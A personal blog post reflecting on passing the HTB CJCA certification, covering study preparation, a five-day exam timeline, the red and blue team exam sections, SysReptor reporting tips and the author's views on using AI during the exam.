CJCA : Here’s everything i wish someone told me
On 17th March, I cleared the CJCA. I’m not gonna write one of those sterile, perfectly polished “here is my glorious certification journey” posts.
This is a brain dump. Messy, honest, and (hopefully) actually useful to someone who is currently in the trenches grinding for this.
The Cert ✨
the numbers first
So, each machine flag is worth 10 points, and you need 80/100 minimum on the red side. But here’s the fun part:
Even if you nail 100 points technically, a bad report can still fail you. The report IS the exam. Treat it like the final boss from day one.
my prep (the honest version)
I did the CJCA learning path on HTB. That’s the baseline requirement, and I’m not gonna pretend I did anything extra fancy or bought expensive third-party courses.
Background context: I’m not really a blue team person. I haven’t explored it much. BUT I did a diploma project around the ELK stack, so I wasn’t going in completely blind. As for the red team part, I was already solving machines regularly, so muscle memory took over there.
The HTB learning path is a solid 10/10 for the red part, but it’s dangerously thin on blue team hands-on time. You’ll spend maybe 5-6 hours per blue module, and that is NOT enough to build muscle memory with ELK. I re-did the entire path once AND doubled down on the blue modules because of self-doubt. (Yes, imposter syndrome is a real problem here. Tip: don’t let it spiral).
what actually matters for prep:
- ▸Complete the full CJCA learning path on HTB. It's the baseline, don't skip the boring parts.
- ▸Solve Easy + Medium Linux AND Windows machines on HTB. I highly recommend clearing the Starting Point machines first.
- ▸Don't overcomplicate red part. The 'Pentest in a Nutshell' module genuinely covers everything you need to know.
- ▸Spend real time in Kibana. Not tutorial-watching time get hands-on. Practice filtering, threat hunting, and building KQL queries from scratch.
- ▸Install SysReptor BEFORE the exam. Do a full mock report on a random HTB machine to learn the UI. Thank me later 😋.
- ▸Expect the unexpected. There are some parts on the exam which are barely covered, so be ready to deal with the uncertainty. But they are very easy to research and get sorted with, so yea.. don't panic.
the 5-day timeline
Pushed the start button on Feb 23 around 6 PM. Didn’t overthink anything, just went with the flow, calm and collected. Got root on 3 machines by 4 AM. Decided to call it and sleep instead of pushing through the fatigue and making stupid mistakes.
Woke up at noon. Ate. Went to the gym. Came back fresh at 6 PM. Cleared the last 2 machines on the red side. Got stuck in a few rabbit holes, but thanks to a rested mind, I was able to step back and recover pretty quickly. This is what recovery looks like not grinding 40 hours straight on energy drinks like a maniac.
Started prepping the report using SysReptor. Genuinely hard to figure out the workflow at first. Binged a tutorial for about an hour, understood the structure, and got comfortable fast since I already know markdown. Then… hit the blue team section and had a massive “okay, what the heck am I supposed to do here?” moment. Total brainfart. It’s not rocket science, just overwhelming. Spoiler: I didn’t give up.
Started with a completely fresh mind. Went back to my notes, re-watched ELK stuff on YT, and re-read the HTB modules. Collected all the evidence methodically, tracked Event IDs, pieced the attack timelines together, and finished the second half of the report. Done with everything by the end of the day. Anxious? Yes. Underconfident on blue team? Very yes. But done.
Spent the whole day redoing everything. Looking for gaps in my logic. Ensuring every screenshot had a purpose. Polishing the report to within an inch of its life. Submitted feeling like I’d done everything I could. Hesitant? Yes. But I did it.
exam structure: what you’re actually doing
- 5 machines total.
- Get User + Root on each.
- 10 pts per flag.
Straightforward if you’ve been solving machines regularly. Don’t overthink the vectors, the “Pentest in a Nutshell” module covers the exact scope you’ll face.
This is the part people sleep on, and they absolutely shouldn’t.
- You are given a large alert queue (volume varies, check your exam brief).
- You need to analyze the logs to determine what happened.
- For each alert, you mark it FP (False Positive) or TP (True Positive) and write a clear explanation backed by hard evidence (screenshots, queries, Event IDs) from the ELK instance.
reporting: don’t sleep on SysReptor
Read this before the exam starts: HTB CJCA Sample Report (SysReptor)
- Install SysReptor before exam day. Set up a CJCA template so you aren’t formatting tables while the clock is ticking.
- Every finding = explanation + screenshot + reproducible steps. No exceptions.
- If you know markdown, SysReptor becomes comfortable fast. But you need to learn the UI first, not mid-exam (unlike someone who’s writing this blog xD).
- Collect outputs, commands, and screenshots as you go. Going back to a machine to reconstruct an exploit path under stress is rough 😕.
the modules: my way of learning
Not all modules are equal. Here’s how I’d split them up conceptually: (Note: These primers won’t feel directly exam relevant, but they’re what make everything else click. Don’t skip them thinking you already know the stuff.)
A quick reality check: There are some parts on the exam which are barely covered in these modules. Be ready to deal with the uncertainty. The good news? Those parts are very easy to research on the fly and get sorted with, so yea.. don’t lose your mind if you see something unfamiliar. Just Google it and adapt and Evolve.
Seriously, the blue team modules are where most people underinvest. The path gives you enough to understand the concepts, but not enough to get your hands dirty. Go beyond the modules. Open up a lab, generate some noise, and hunt it yourself. I’d recommend running through the Blue labs at least 2X.
what i’d do differently
- ▸Spend WAY more time on blue team prep. I panicked a lot during that phase, and it was entirely avoidable.
- ▸More real Kibana practice: Not just watching videos, but actually building KQL queries, filtering noise, and hunting through raw logs.
- ▸Read the sample SysReptor CJCA report before day one: https://docs.sysreptor.com/assets/reports/HTB-CJCA-Report.pdf
- ▸Practiced SysReptor on a dummy report before the clock started.
- ▸Practice querying Sysmon logs, Windows event logs, and analyzing parent/child process relationships.
- ▸Get intimately comfortable with critical Windows Event IDs and what they actually mean in an attack context.
Do these SIEM/ELK labs earlier: Awesome-Splunk-and-Elastic-SIEM-Practice-Labs
what about AI?
Honestly? It comes down to your ethics.
I didn’t care about using AI during the exam. I’ve always seen HTB as a learning opportunity first; the cert is just a byproduct of actually getting good. If you’re using AI to skip the understanding, you’re only cheating the learning, not the exam. Imagine paying for a practical exam and using AI to cheat yourself out of the practice? 😭
If you’re doing this to actually get better at security, use AI as a tool (like explaining a weird command output), not a crutch. If you’re doing this just to collect a shiny badge, that’s a you problem.
tldr for people who scrolled here first
- Do the HTB path, but don’t stop there. Solve machines in the HTB labs Starting Point section, and do extra ELK/SIEM labs.
- Blue team is where people get caught off guard. Take it seriously.
- There will be things on the exam barely covered in the learning path. Don’t panic just research them on the fly.
- The report is not optional fluff. It’s the whole thing. A bad report = a failed exam.
- Sleep, eat, and hit the gym during the exam. Recovery is a valid strategy.
- Learn SysReptor before day one. Set up the template. Read the sample report.
- Trust your prep. The self-doubt spiral is real and a massive waste of energy.
- Believe in yourself. You can do it.
